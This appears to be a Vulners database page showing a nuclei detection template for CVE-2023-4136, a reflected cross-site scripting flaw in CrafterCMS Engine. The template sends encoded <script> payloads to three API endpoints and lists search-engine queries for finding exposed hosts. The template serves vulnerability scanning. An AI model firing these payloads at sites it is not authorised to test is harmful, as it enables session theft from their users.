Lucene search
K

CrafterCMS Engine - Cross-Site Scripting

🗓️ 27 Jun 2026 03:01:36Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 36 Views

CrafterCMS Engine has a Cross-Site Scripting vulnerability allowing JavaScript execution via URL transformer.

Related
Refs
Code
id: CVE-2023-4136

info:
  name: CrafterCMS Engine - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    CrafterCMS Engine is vulnerable to reflected cross-site scripting (XSS) via the transformerName parameter in the /api/1/site/url/transform endpoint, allowing attackers to execute arbitrary JavaScript in the context of the user.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the transformerName parameter in various API endpoints to steal CrafterCMS user credentials and session data.
  remediation: |
    Update CrafterCMS Engine to the latest version that addresses this vulnerability.
  reference:
    - https://karmainsecurity.com/KIS-2023-09
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4136
  classification:
    cve-id: CVE-2023-4136
    cwe-id: CWE-79
    epss-score: 0.01304
    epss-percentile: 0.66901
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 6.1
  metadata:
    verified: true
    max-request: 1
    vendor: craftercms
    product: craftercms
    shodan-query: http.html:"craftercms"
    fofa-query: body="craftercms"
  tags: cve,cve2023,craftercms,xss,vuln

http:
  - raw:
      - |
        GET /api/1/site/url/transform?transformerName=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E&url= HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml

      - |
        GET /api/1/site/content_store/children?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml

      - |
        GET /api/1/site/content_store/item?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500 || status_code == 404'
          - 'contains(content_type, "application/xhtml+xml")'
          - 'contains(body, "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</script>")'
          - 'contains_any(body, "Url transformer", "No folder found at", "No item found at")'
        condition: and
# digest: 490a004630440220525dd4826f6059bb522873361a6da3937de1bb7bc9b0fde5a5863de37fe69f5502203adf8d895d15525113d6b9ca511784eefebb8b71b65668f11a6a9f2ccfb6fde2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1 - 7.4
EPSS0.01304
SSVC
36